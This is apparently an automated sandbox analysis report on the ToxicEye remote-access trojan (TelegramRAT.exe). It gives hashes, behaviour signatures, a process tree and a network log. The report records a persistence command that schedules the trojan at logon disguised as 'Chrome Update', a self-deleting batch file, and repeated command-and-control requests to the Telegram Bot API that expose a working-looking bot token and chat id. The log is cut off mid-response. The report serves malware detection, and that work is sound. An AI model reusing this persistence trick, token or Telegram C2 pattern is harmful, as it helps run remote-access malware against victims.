Overview

overview

10

Static

static

10

TelegramRAT.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/01/2025, 18:24 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TelegramRAT.exe

  • Size

    111KB

  • MD5

    e3d580a17a351366392ec9e2af674524

  • SHA1

    354e8f441c2fa510e1b3ecab222280649a7efb9a

  • SHA256

    6e644b385d296b76bb3ba68ff006d6b86de763c8b5792e07053e20e3d8218d75

  • SHA512

    a7e2726a2b28a39f6624f419ab9194b4c8e3d4c117e324c2719b3f944c5262cbc064df8989d34b984d8541767327d18381adf6678e4445dc8a49afe0a0824309

  • SSDEEP

    1536:dn+bAQACiEXM91qQIwvL9x1Cc0Di4OybhDqI64QW6zCrAZuQPEDrL:sbaCHXELrJp6bxqH4QW6zCrAZuQwv

Score
10/10
toxiceyediscoveryrattrojan

Malware Config

Signatures

  • ToxicEye

    ToxicEye is a trojan written in C#.

    rattrojantoxiceye
  • Toxiceye family
    toxiceye
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe
    "C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2696
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:3088
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpC89F.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpC89F.tmp.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:960
      • C:\Windows\system32\tasklist.exe
        Tasklist /fi "PID eq 2696"
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1688
      • C:\Windows\system32\find.exe
        find ":"
        3⤵
          PID:1604
        • C:\Windows\system32\timeout.exe
          Timeout /T 1 /Nobreak
          3⤵
          • Delays execution with timeout.exe
          PID:3228
        • C:\Users\ToxicEye\rat.exe
          "rat.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2424
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4072
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      1⤵
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff85062cc40,0x7ff85062cc4c,0x7ff85062cc58
        2⤵
          PID:2788
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1988,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1984 /prefetch:2
          2⤵
            PID:3696
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2004,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:3
            2⤵
              PID:1548
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:8
              2⤵
                PID:1496
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:1
                2⤵
                  PID:4580
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3416 /prefetch:1
                  2⤵
                    PID:4936
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4588,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1
                    2⤵
                      PID:4952
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4732,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4756 /prefetch:8
                      2⤵
                        PID:4420
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4844,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4860 /prefetch:8
                        2⤵
                          PID:4732
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5052 /prefetch:8
                          2⤵
                            PID:4220
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5136,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4888 /prefetch:8
                            2⤵
                              PID:3232
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5132,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:8
                              2⤵
                                PID:3748
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4812,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5160 /prefetch:8
                                2⤵
                                  PID:4492
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5156,i,18193699235837429827,12820216869050488248,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5236 /prefetch:2
                                  2⤵
                                    PID:3176
                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                  1⤵
                                    PID:2936
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                    1⤵
                                      PID:4360

                                    Network

                                    • flag-us
                                      DNS
                                      8.8.8.8.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      8.8.8.8.in-addr.arpa
                                      IN PTR
                                      Response
                                      8.8.8.8.in-addr.arpa
                                      IN PTR
                                      dnsgoogle
                                    • flag-us
                                      DNS
                                      60.153.16.2.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      60.153.16.2.in-addr.arpa
                                      IN PTR
                                      Response
                                      60.153.16.2.in-addr.arpa
                                      IN PTR
                                      a2-16-153-60deploystaticakamaitechnologiescom
                                    • flag-us
                                      DNS
                                      196.249.167.52.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      196.249.167.52.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      75.159.190.20.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      75.159.190.20.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      google.com
                                      rat.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      google.com
                                      IN A
                                      Response
                                      google.com
                                      IN A
                                      142.250.180.14
                                    • flag-us
                                      DNS
                                      api.telegram.org
                                      rat.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      api.telegram.org
                                      IN A
                                      Response
                                      api.telegram.org
                                      IN A
                                      149.154.167.220
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%8D%80%20Bot%20connected
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%8D%80%20Bot%20connected HTTP/1.1
                                      Host: api.telegram.org
                                      Connection: Keep-Alive
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:47 GMT
                                      Content-Type: application/json
                                      Content-Length: 274
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:47 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=1
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=1 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:48 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=2
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=2 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:49 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=3
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=3 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:50 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=4
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=4 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:51 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=5
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=5 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:52 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=6
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=6 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:53 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=7
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=7 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:54 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=8
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=8 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:55 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=9
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=9 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:56 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=10
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=10 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:57 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=11
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=11 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:24:58 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=12
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=12 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:00 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=13
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=13 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:01 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=14
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=14 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:02 GMT
                                      Content-Type: application/json
                                      Content-Length: 370
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506592
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506592 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:03 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506593
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506593 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:04 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506594
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506594 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Wed, 08 Jan 2025 18:25:05 GMT
                                      Content-Type: application/json
                                      Content-Length: 23
                                      Connection: keep-alive
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    • flag-nl
                                      GET
                                      https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506595
                                      rat.exe
                                      Remote address:
                                      149.154.167.220:443
                                      Request
                                      GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506595 HTTP/1.1
                                      Host: api.telegram.org
                                      Response
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
